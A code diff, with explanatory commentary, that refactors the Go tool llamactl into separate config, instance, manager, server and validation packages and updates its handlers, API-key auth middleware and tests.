-	manager := createTestManager()
-
-	err := manager.DeleteInstance("nonexistent")
-	if err == nil {
-		t.Error("Expected error for deleting nonexistent instance")
-	}
-	if !strings.Contains(err.Error(), "not found") {
-		t.Errorf("Expected 'not found' error, got: %v", err)
-	}
-}
-
-func TestUpdateInstance_Success(t *testing.T) {
-	manager := createTestManager()
-
-	// Create an instance
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-			Port:  8080,
-		},
-	}
-	_, err := manager.CreateInstance("test-instance", options)
-	if err != nil {
-		t.Fatalf("CreateInstance failed: %v", err)
-	}
-
-	// Update it
-	newOptions := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/new-model.gguf",
-			Port:  8081,
-		},
-	}
-
-	updated, err := manager.UpdateInstance("test-instance", newOptions)
-	if err != nil {
-		t.Fatalf("UpdateInstance failed: %v", err)
-	}
-
-	if updated.GetOptions().Model != "/path/to/new-model.gguf" {
-		t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
-	}
-	if updated.GetOptions().Port != 8081 {
-		t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
-	}
-}
-
-func TestUpdateInstance_NotFound(t *testing.T) {
-	manager := createTestManager()
-
-	options := &llamactl.CreateInstanceOptions{
-		LlamaServerOptions: llamactl.LlamaServerOptions{
-			Model: "/path/to/model.gguf",
-		},
-	}
-
-	_, err := manager.UpdateInstance("nonexistent", options)
-	if err == nil {
-		t.Error("Expected error for updating nonexistent instance")
-	}
-	if !strings.Contains(err.Error(), "not found") {
-		t.Errorf("Expected 'not found' error, got: %v", err)
-	}
-}
-
-// Helper function to create a test manager with standard config
-func createTestManager() llamactl.InstanceManager {
-	config := llamactl.InstancesConfig{
-		PortRange:           [2]int{8000, 9000},
-		LogDirectory:        "/tmp/test",
-		MaxInstances:        10,
-		LlamaExecutable:     "llama-server",
-		DefaultAutoRestart:  true,
-		DefaultMaxRestarts:  3,
-		DefaultRestartDelay: 5,
-	}
-	return llamactl.NewInstanceManager(config)
-}
```
```diff
@@ -1,10 +1,13 @@
-package llamactl
+package server

 import (
 	"bytes"
 	"encoding/json"
 	"fmt"
 	"io"
+	"llamactl/pkg/config"
+	"llamactl/pkg/instance"
+	"llamactl/pkg/manager"
 	"net/http"
 	"os/exec"
 	"strconv"
@@ -14,14 +17,14 @@ import (
 )

 type Handler struct {
-	InstanceManager InstanceManager
-	config          Config
+	InstanceManager manager.InstanceManager
+	cfg             config.AppConfig
 }

-func NewHandler(im InstanceManager, config Config) *Handler {
+func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
 	return &Handler{
 		InstanceManager: im,
-		config:          config,
+		cfg:             cfg,
 	}
 }

@@ -137,13 +140,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
 			return
 		}

-		var options CreateInstanceOptions
+		var options instance.CreateInstanceOptions
 		if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
 			http.Error(w, "Invalid request body", http.StatusBadRequest)
 			return
 		}

-		instance, err := h.InstanceManager.CreateInstance(name, &options)
+		inst, err := h.InstanceManager.CreateInstance(name, &options)
 		if err != nil {
 			http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
 			return
@@ -151,7 +154,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {

 		w.Header().Set("Content-Type", "application/json")
 		w.WriteHeader(http.StatusCreated)
-		if err := json.NewEncoder(w).Encode(instance); err != nil {
+		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
@@ -177,14 +180,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
 			return
 		}

-		instance, err := h.InstanceManager.GetInstance(name)
+		inst, err := h.InstanceManager.GetInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}

 		w.Header().Set("Content-Type", "application/json")
-		if err := json.NewEncoder(w).Encode(instance); err != nil {
+		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
@@ -212,20 +215,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
 			return
 		}

-		var options CreateInstanceOptions
+		var options instance.CreateInstanceOptions
 		if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
 			http.Error(w, "Invalid request body", http.StatusBadRequest)
 			return
 		}

-		instance, err := h.InstanceManager.UpdateInstance(name, &options)
+		inst, err := h.InstanceManager.UpdateInstance(name, &options)
 		if err != nil {
 			http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}

 		w.Header().Set("Content-Type", "application/json")
-		if err := json.NewEncoder(w).Encode(instance); err != nil {
+		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
@@ -251,14 +254,14 @@ func (h *Handler) StartInstance() http.HandlerFunc {
 			return
 		}

-		instance, err := h.InstanceManager.StartInstance(name)
+		inst, err := h.InstanceManager.StartInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}

 		w.Header().Set("Content-Type", "application/json")
-		if err := json.NewEncoder(w).Encode(instance); err != nil {
+		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
@@ -284,14 +287,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
 			return
 		}

-		instance, err := h.InstanceManager.StopInstance(name)
+		inst, err := h.InstanceManager.StopInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}

 		w.Header().Set("Content-Type", "application/json")
-		if err := json.NewEncoder(w).Encode(instance); err != nil {
+		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
@@ -317,14 +320,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
 			return
 		}

-		instance, err := h.InstanceManager.RestartInstance(name)
+		inst, err := h.InstanceManager.RestartInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}

 		w.Header().Set("Content-Type", "application/json")
-		if err := json.NewEncoder(w).Encode(instance); err != nil {
+		if err := json.NewEncoder(w).Encode(inst); err != nil {
 			http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}
@@ -389,13 +392,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
 			return
 		}

-		instance, err := h.InstanceManager.GetInstance(name)
+		inst, err := h.InstanceManager.GetInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}

-		logs, err := instance.GetLogs(num_lines)
+		logs, err := inst.GetLogs(num_lines)
 		if err != nil {
 			http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
 			return
@@ -426,19 +429,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
 			return
 		}

-		instance, err := h.InstanceManager.GetInstance(name)
+		inst, err := h.InstanceManager.GetInstance(name)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}

-		if !instance.Running {
+		if !inst.Running {
 			http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
 			return
 		}

 		// Get the cached proxy for this instance
-		proxy, err := instance.GetProxy()
+		proxy, err := inst.GetProxy()
 		if err != nil {
 			http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
 			return
@@ -489,11 +492,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
 		}

 		openaiInstances := make([]OpenAIInstance, len(instances))
-		for i, instance := range instances {
+		for i, inst := range instances {
 			openaiInstances[i] = OpenAIInstance{
-				ID:      instance.Name,
+				ID:      inst.Name,
 				Object:  "model",
-				Created: instance.Created,
+				Created: inst.Created,
 				OwnedBy: "llamactl",
 			}
 		}
@@ -545,19 +548,19 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
 			return
 		}

-		// Route to the appropriate instance based on model name
+		// Route to the appropriate inst based on model name
-		instance, err := h.InstanceManager.GetInstance(modelName)
+		inst, err := h.InstanceManager.GetInstance(modelName)
 		if err != nil {
 			http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
 			return
 		}

-		if !instance.Running {
+		if !inst.Running {
 			http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
 			return
 		}

-		proxy, err := instance.GetProxy()
+		proxy, err := inst.GetProxy()
 		if err != nil {
 			http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
 			return
```
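Taken together, these hunks complete the move from a single `llamactl` package to `pkg/config`, `pkg/instance`, `pkg/manager`, and `pkg/server`. A rough sketch of how the pieces wire together after the split, using only the two constructors visible in the diffs (the `AppConfig` field layout here is an assumption):

```go
package main

import (
	"llamactl/pkg/config"
	"llamactl/pkg/manager"
	"llamactl/pkg/server"
)

func main() {
	// Assumed AppConfig shape; only the instances sub-config appears in the diffs.
	cfg := config.AppConfig{
		Instances: config.InstancesConfig{
			PortRange:    [2]int{8000, 9000},
			MaxInstances: 10,
		},
	}

	im := manager.NewInstanceManager(cfg.Instances) // constructor from the manager diff
	h := server.NewHandler(im, cfg)                 // constructor from the handlers diff

	// Route registration is not part of this diff; the handler methods
	// (h.CreateInstance(), h.StartInstance(), ...) each return an
	// http.HandlerFunc to be mounted on the management API routes.
	_ = h
}
```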
```diff
@@ -1,10 +1,11 @@
-package llamactl
+package server

 import (
 	"crypto/rand"
 	"crypto/subtle"
 	"encoding/hex"
 	"fmt"
+	"llamactl/pkg/config"
 	"log"
 	"net/http"
 	"os"
@@ -26,7 +27,7 @@ type APIAuthMiddleware struct {
 }

 // NewAPIAuthMiddleware creates a new APIAuthMiddleware with the given configuration
-func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
+func NewAPIAuthMiddleware(authCfg config.AuthConfig) *APIAuthMiddleware {

 	var generated bool = false

@@ -35,25 +36,25 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {

 	const banner = "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"

-	if config.RequireManagementAuth && len(config.ManagementKeys) == 0 {
+	if authCfg.RequireManagementAuth && len(authCfg.ManagementKeys) == 0 {
 		key := generateAPIKey(KeyTypeManagement)
 		managementAPIKeys[key] = true
 		generated = true
 		fmt.Printf("%s\n⚠️  MANAGEMENT AUTHENTICATION REQUIRED\n%s\n", banner, banner)
 		fmt.Printf("🔑 Generated Management API Key:\n\n   %s\n\n", key)
 	}
-	for _, key := range config.ManagementKeys {
+	for _, key := range authCfg.ManagementKeys {
 		managementAPIKeys[key] = true
 	}

-	if config.RequireInferenceAuth && len(config.InferenceKeys) == 0 {
+	if authCfg.RequireInferenceAuth && len(authCfg.InferenceKeys) == 0 {
 		key := generateAPIKey(KeyTypeInference)
 		inferenceAPIKeys[key] = true
 		generated = true
 		fmt.Printf("%s\n⚠️  INFERENCE AUTHENTICATION REQUIRED\n%s\n", banner, banner)
 		fmt.Printf("🔑 Generated Inference API Key:\n\n   %s\n\n", key)
 	}
-	for _, key := range config.InferenceKeys {
+	for _, key := range authCfg.InferenceKeys {
 		inferenceAPIKeys[key] = true
 	}

@@ -66,9 +67,9 @@ func NewAPIAuthMiddleware(config AuthConfig) *APIAuthMiddleware {
 	}

 	return &APIAuthMiddleware{
-		requireInferenceAuth:  config.RequireInferenceAuth,
+		requireInferenceAuth:  authCfg.RequireInferenceAuth,
 		inferenceKeys:         inferenceAPIKeys,
-		requireManagementAuth: config.RequireManagementAuth,
+		requireManagementAuth: authCfg.RequireManagementAuth,
 		managementKeys:        managementAPIKeys,
 	}
 }
```
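The import block above includes `crypto/subtle`, which points at constant-time key comparison. A plausible sketch of the lookup (the method name and structure are assumptions; the validation code itself is outside this diff):

```go
// Hypothetical sketch: checking a provided key against the configured set
// with subtle.ConstantTimeCompare avoids leaking key prefixes through timing.
func (a *APIAuthMiddleware) isValidKey(provided string, keys map[string]bool) bool {
	valid := false
	for key := range keys {
		// Compare every key rather than returning early, keeping timing uniform.
		if subtle.ConstantTimeCompare([]byte(provided), []byte(key)) == 1 {
			valid = true
		}
	}
	return valid
}
```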
@@ -1,18 +1,18 @@
-package llamactl_test
+package server_test

 import (
+	"llamactl/pkg/config"
+	"llamactl/pkg/server"
 	"net/http"
 	"net/http/httptest"
 	"strings"
 	"testing"
-
-	llamactl "llamactl/pkg"
 )

 func TestAuthMiddleware(t *testing.T) {
 	tests := []struct {
 		name string
-		keyType llamactl.KeyType
+		keyType server.KeyType
 		inferenceKeys []string
 		managementKeys []string
 		requestKey string
@@ -22,7 +22,7 @@ func TestAuthMiddleware(t *testing.T) {
 		// Valid key tests
 		{
 			name: "valid inference key for inference",
-			keyType: llamactl.KeyTypeInference,
+			keyType: server.KeyTypeInference,
 			inferenceKeys: []string{"sk-inference-valid123"},
 			requestKey: "sk-inference-valid123",
 			method: "GET",
@@ -30,7 +30,7 @@ func TestAuthMiddleware(t *testing.T) {
 		},
 		{
 			name: "valid management key for inference", // Management keys work for inference
-			keyType: llamactl.KeyTypeInference,
+			keyType: server.KeyTypeInference,
 			managementKeys: []string{"sk-management-admin123"},
 			requestKey: "sk-management-admin123",
 			method: "GET",
@@ -38,7 +38,7 @@ func TestAuthMiddleware(t *testing.T) {
 		},
 		{
 			name: "valid management key for management",
-			keyType: llamactl.KeyTypeManagement,
+			keyType: server.KeyTypeManagement,
 			managementKeys: []string{"sk-management-admin123"},
 			requestKey: "sk-management-admin123",
 			method: "GET",
@@ -48,7 +48,7 @@ func TestAuthMiddleware(t *testing.T) {
 		// Invalid key tests
 		{
 			name: "inference key for management should fail",
-			keyType: llamactl.KeyTypeManagement,
+			keyType: server.KeyTypeManagement,
 			inferenceKeys: []string{"sk-inference-user123"},
 			requestKey: "sk-inference-user123",
 			method: "GET",
@@ -56,7 +56,7 @@ func TestAuthMiddleware(t *testing.T) {
 		},
 		{
 			name: "invalid inference key",
-			keyType: llamactl.KeyTypeInference,
+			keyType: server.KeyTypeInference,
 			inferenceKeys: []string{"sk-inference-valid123"},
 			requestKey: "sk-inference-invalid",
 			method: "GET",
@@ -64,7 +64,7 @@ func TestAuthMiddleware(t *testing.T) {
 		},
 		{
 			name: "missing inference key",
-			keyType: llamactl.KeyTypeInference,
+			keyType: server.KeyTypeInference,
 			inferenceKeys: []string{"sk-inference-valid123"},
 			requestKey: "",
 			method: "GET",
@@ -72,7 +72,7 @@ func TestAuthMiddleware(t *testing.T) {
 		},
 		{
 			name: "invalid management key",
-			keyType: llamactl.KeyTypeManagement,
+			keyType: server.KeyTypeManagement,
 			managementKeys: []string{"sk-management-valid123"},
 			requestKey: "sk-management-invalid",
 			method: "GET",
@@ -80,7 +80,7 @@ func TestAuthMiddleware(t *testing.T) {
 		},
 		{
 			name: "missing management key",
-			keyType: llamactl.KeyTypeManagement,
+			keyType: server.KeyTypeManagement,
 			managementKeys: []string{"sk-management-valid123"},
 			requestKey: "",
 			method: "GET",
@@ -90,7 +90,7 @@ func TestAuthMiddleware(t *testing.T) {
 		// OPTIONS requests should always pass
 		{
 			name: "OPTIONS request bypasses inference auth",
-			keyType: llamactl.KeyTypeInference,
+			keyType: server.KeyTypeInference,
 			inferenceKeys: []string{"sk-inference-valid123"},
 			requestKey: "",
 			method: "OPTIONS",
@@ -98,7 +98,7 @@ func TestAuthMiddleware(t *testing.T) {
 		},
 		{
 			name: "OPTIONS request bypasses management auth",
-			keyType: llamactl.KeyTypeManagement,
+			keyType: server.KeyTypeManagement,
 			managementKeys: []string{"sk-management-valid123"},
 			requestKey: "",
 			method: "OPTIONS",
@@ -108,7 +108,7 @@ func TestAuthMiddleware(t *testing.T) {
 		// Cross-key-type validation
 		{
 			name: "management key works for inference endpoint",
-			keyType: llamactl.KeyTypeInference,
+			keyType: server.KeyTypeInference,
 			inferenceKeys: []string{},
 			managementKeys: []string{"sk-management-admin"},
 			requestKey: "sk-management-admin",
@@ -119,11 +119,11 @@ func TestAuthMiddleware(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			config := llamactl.AuthConfig{
+			cfg := config.AuthConfig{
 				InferenceKeys: tt.inferenceKeys,
 				ManagementKeys: tt.managementKeys,
 			}
-			middleware := llamactl.NewAPIAuthMiddleware(config)
+			middleware := server.NewAPIAuthMiddleware(cfg)

 			// Create test request
 			req := httptest.NewRequest(tt.method, "/test", nil)
@@ -133,12 +133,12 @@ func TestAuthMiddleware(t *testing.T) {

 			// Create test handler using the appropriate middleware
 			var handler http.Handler
-			if tt.keyType == llamactl.KeyTypeInference {
-				handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			if tt.keyType == server.KeyTypeInference {
+				handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 					w.WriteHeader(http.StatusOK)
 				}))
 			} else {
-				handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+				handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 					w.WriteHeader(http.StatusOK)
 				}))
 			}
@@ -170,17 +170,17 @@ func TestAuthMiddleware(t *testing.T) {
 func TestGenerateAPIKey(t *testing.T) {
 	tests := []struct {
 		name string
-		keyType llamactl.KeyType
+		keyType server.KeyType
 	}{
-		{"inference key generation", llamactl.KeyTypeInference},
-		{"management key generation", llamactl.KeyTypeManagement},
+		{"inference key generation", server.KeyTypeInference},
+		{"management key generation", server.KeyTypeManagement},
 	}

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test auto-generation by creating config that will trigger it
-			var config llamactl.AuthConfig
-			if tt.keyType == llamactl.KeyTypeInference {
+			var config config.AuthConfig
+			if tt.keyType == server.KeyTypeInference {
 				config.RequireInferenceAuth = true
 				config.InferenceKeys = []string{} // Empty to trigger generation
 			} else {
@@ -189,19 +189,19 @@ func TestGenerateAPIKey(t *testing.T) {
 			}

 			// Create middleware - this should trigger key generation
-			middleware := llamactl.NewAPIAuthMiddleware(config)
+			middleware := server.NewAPIAuthMiddleware(config)

 			// Test that auth is required (meaning a key was generated)
 			req := httptest.NewRequest("GET", "/", nil)
 			recorder := httptest.NewRecorder()

 			var handler http.Handler
-			if tt.keyType == llamactl.KeyTypeInference {
-				handler = middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			if tt.keyType == server.KeyTypeInference {
+				handler = middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 					w.WriteHeader(http.StatusOK)
 				}))
 			} else {
-				handler = middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+				handler = middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 					w.WriteHeader(http.StatusOK)
 				}))
 			}
@@ -214,18 +214,18 @@ func TestGenerateAPIKey(t *testing.T) {
 			}

 			// Test uniqueness by creating another middleware instance
-			middleware2 := llamactl.NewAPIAuthMiddleware(config)
+			middleware2 := server.NewAPIAuthMiddleware(config)

 			req2 := httptest.NewRequest("GET", "/", nil)
 			recorder2 := httptest.NewRecorder()

-			if tt.keyType == llamactl.KeyTypeInference {
-				handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			if tt.keyType == server.KeyTypeInference {
+				handler2 := middleware2.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 					w.WriteHeader(http.StatusOK)
 				}))
 				handler2.ServeHTTP(recorder2, req2)
 			} else {
-				handler2 := middleware2.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+				handler2 := middleware2.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 					w.WriteHeader(http.StatusOK)
 				}))
 				handler2.ServeHTTP(recorder2, req2)
@@ -307,21 +307,21 @@ func TestAutoGeneration(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			config := llamactl.AuthConfig{
+			cfg := config.AuthConfig{
 				RequireInferenceAuth: tt.requireInference,
 				RequireManagementAuth: tt.requireManagement,
 				InferenceKeys: tt.providedInference,
 				ManagementKeys: tt.providedManagement,
 			}

-			middleware := llamactl.NewAPIAuthMiddleware(config)
+			middleware := server.NewAPIAuthMiddleware(cfg)

 			// Test inference behavior if inference auth is required
 			if tt.requireInference {
 				req := httptest.NewRequest("GET", "/v1/models", nil)
 				recorder := httptest.NewRecorder()

-				handler := middleware.AuthMiddleware(llamactl.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+				handler := middleware.AuthMiddleware(server.KeyTypeInference)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 					w.WriteHeader(http.StatusOK)
 				}))

@@ -338,7 +338,7 @@ func TestAutoGeneration(t *testing.T) {
 			req := httptest.NewRequest("GET", "/api/v1/instances", nil)
 			recorder := httptest.NewRecorder()

-			handler := middleware.AuthMiddleware(llamactl.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+			handler := middleware.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 				w.WriteHeader(http.StatusOK)
 			}))

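The hunks that attach `tt.requestKey` to the request (between `@@ -119` and `@@ -133`) are elided from this diff, so the header format is not visible here. A self-contained sketch of exercising one middleware-wrapped handler the same way the table-driven test does, with the `Authorization` header format as an explicit assumption:

```go
package server_test

import (
	"net/http"
	"net/http/httptest"
	"testing"

	"llamactl/pkg/config"
	"llamactl/pkg/server"
)

func TestManagementKeySketch(t *testing.T) {
	cfg := config.AuthConfig{ManagementKeys: []string{"sk-management-admin123"}}
	mw := server.NewAPIAuthMiddleware(cfg)

	// Wrap a trivial handler in the management-key middleware.
	handler := mw.AuthMiddleware(server.KeyTypeManagement)(http.HandlerFunc(
		func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) },
	))

	req := httptest.NewRequest("GET", "/api/v1/instances", nil)
	req.Header.Set("Authorization", "Bearer sk-management-admin123") // assumed header format
	rec := httptest.NewRecorder()
	handler.ServeHTTP(rec, req)

	if rec.Code != http.StatusOK {
		t.Fatalf("expected 200, got %d", rec.Code)
	}
}
```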
@@ -1,4 +1,4 @@
-package llamactl
+package server

 type OpenAIListInstancesResponse struct {
 	Object string `json:"object"`
@@ -1,4 +1,4 @@
-package llamactl
+package server

 import (
 	"fmt"
@@ -18,7 +18,7 @@ func SetupRouter(handler *Handler) *chi.Mux {

 	// Add CORS middleware
 	r.Use(cors.Handler(cors.Options{
-		AllowedOrigins: handler.config.Server.AllowedOrigins,
+		AllowedOrigins: handler.cfg.Server.AllowedOrigins,
 		AllowedMethods: []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
 		AllowedHeaders: []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
 		ExposedHeaders: []string{"Link"},
@@ -27,9 +27,9 @@ func SetupRouter(handler *Handler) *chi.Mux {
 	}))

 	// Add API authentication middleware
-	authMiddleware := NewAPIAuthMiddleware(handler.config.Auth)
+	authMiddleware := NewAPIAuthMiddleware(handler.cfg.Auth)

-	if handler.config.Server.EnableSwagger {
+	if handler.cfg.Server.EnableSwagger {
 		r.Get("/swagger/*", httpSwagger.Handler(
 			httpSwagger.URL("/swagger/doc.json"),
 		))
@@ -38,7 +38,7 @@ func SetupRouter(handler *Handler) *chi.Mux {
 	// Define routes
 	r.Route("/api/v1", func(r chi.Router) {

-		if authMiddleware != nil && handler.config.Auth.RequireManagementAuth {
+		if authMiddleware != nil && handler.cfg.Auth.RequireManagementAuth {
 			r.Use(authMiddleware.AuthMiddleware(KeyTypeManagement))
 		}

@@ -73,7 +73,7 @@ func SetupRouter(handler *Handler) *chi.Mux {

 	r.Route(("/v1"), func(r chi.Router) {

-		if authMiddleware != nil && handler.config.Auth.RequireInferenceAuth {
+		if authMiddleware != nil && handler.cfg.Auth.RequireInferenceAuth {
 			r.Use(authMiddleware.AuthMiddleware(KeyTypeInference))
 		}

10 pkg/testutil/helpers.go (new file)
@@ -0,0 +1,10 @@
+package testutil
+
+// Helper functions for pointer fields
+func BoolPtr(b bool) *bool {
+	return &b
+}
+
+func IntPtr(i int) *int {
+	return &i
+}
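This new helper package exists because Go forbids taking the address of a literal (`&true` and `&5` do not compile), so optional pointer-typed fields need helpers like these to be set inline. A brief usage sketch, matching how the validation tests further down adopt them:

```go
package main

import (
	"fmt"

	"llamactl/pkg/instance"
	"llamactl/pkg/testutil"
)

func main() {
	// Pointer-typed optional fields set from literals via the helpers.
	opts := &instance.CreateInstanceOptions{
		AutoRestart: testutil.BoolPtr(true),
		MaxRestarts: testutil.IntPtr(5),
	}
	fmt.Println(*opts.AutoRestart, *opts.MaxRestarts) // true 5
}
```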
@@ -1,7 +1,8 @@
-package llamactl
+package validation

 import (
 	"fmt"
+	"llamactl/pkg/instance"
 	"reflect"
 	"regexp"
 )
@@ -33,7 +34,7 @@ func validateStringForInjection(value string) error {
 }

 // ValidateInstanceOptions performs minimal security validation
-func ValidateInstanceOptions(options *CreateInstanceOptions) error {
+func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
 	if options == nil {
 		return ValidationError(fmt.Errorf("options cannot be nil"))
 	}
@@ -101,16 +102,16 @@ func validateStructStrings(v any, fieldPath string) error {
 	return nil
 }

-func ValidateInstanceName(name string) error {
+func ValidateInstanceName(name string) (string, error) {
 	// Validate instance name
 	if name == "" {
-		return ValidationError(fmt.Errorf("name cannot be empty"))
+		return "", ValidationError(fmt.Errorf("name cannot be empty"))
 	}
 	if !validNamePattern.MatchString(name) {
-		return ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
+		return "", ValidationError(fmt.Errorf("name contains invalid characters (only alphanumeric, hyphens, underscores allowed)"))
 	}
 	if len(name) > 50 {
-		return ValidationError(fmt.Errorf("name too long (max 50 characters)"))
+		return "", ValidationError(fmt.Errorf("name too long (max 50 characters)"))
 	}
-	return nil
+	return name, nil
 }
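`ValidateInstanceName` now returns the validated name alongside the error, so callers consume the sanitized value instead of reusing the raw input. A sketch of the new call pattern (the input string is illustrative):

```go
package main

import (
	"fmt"
	"log"

	"llamactl/pkg/validation"
)

func main() {
	name, err := validation.ValidateInstanceName("llama2-7b")
	if err != nil {
		// Rejected when empty, containing invalid characters, or over 50 chars.
		log.Fatal(err)
	}
	fmt.Println("creating instance:", name) // use the returned, validated name
}
```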
@@ -1,10 +1,12 @@
-package llamactl_test
+package validation_test

 import (
+	"llamactl/pkg/backends/llamacpp"
+	"llamactl/pkg/instance"
+	"llamactl/pkg/testutil"
+	"llamactl/pkg/validation"
 	"strings"
 	"testing"
-
-	llamactl "llamactl/pkg"
 )

 func TestValidateInstanceName(t *testing.T) {
@@ -39,16 +41,23 @@ func TestValidateInstanceName(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			err := llamactl.ValidateInstanceName(tt.input)
+			name, err := validation.ValidateInstanceName(tt.input)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceName(%q) error = %v, wantErr %v", tt.input, err, tt.wantErr)
 			}
+			if tt.wantErr {
+				return // Skip further checks if we expect an error
+			}
+			// If no error, check that the name is returned as expected
+			if name != tt.input {
+				t.Errorf("ValidateInstanceName(%q) = %q, want %q", tt.input, name, tt.input)
+			}
 		})
 	}
 }

 func TestValidateInstanceOptions_NilOptions(t *testing.T) {
-	err := llamactl.ValidateInstanceOptions(nil)
+	err := validation.ValidateInstanceOptions(nil)
 	if err == nil {
 		t.Error("Expected error for nil options")
 	}
@@ -73,13 +82,13 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {

 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			options := &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options := &instance.CreateInstanceOptions{
+				LlamaServerOptions: llamacpp.LlamaServerOptions{
 					Port: tt.port,
 				},
 			}

-			err := llamactl.ValidateInstanceOptions(options)
+			err := validation.ValidateInstanceOptions(options)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateInstanceOptions(port=%d) error = %v, wantErr %v", tt.port, err, tt.wantErr)
 			}
@@ -126,13 +135,13 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Model field (string field)
-			options := &llamactl.CreateInstanceOptions{
-				LlamaServerOptions: llamactl.LlamaServerOptions{
+			options := &instance.CreateInstanceOptions{
+				LlamaServerOptions: llamacpp.LlamaServerOptions{
 					Model: tt.value,
 				},
 			}

-			err := llamactl.ValidateInstanceOptions(options)
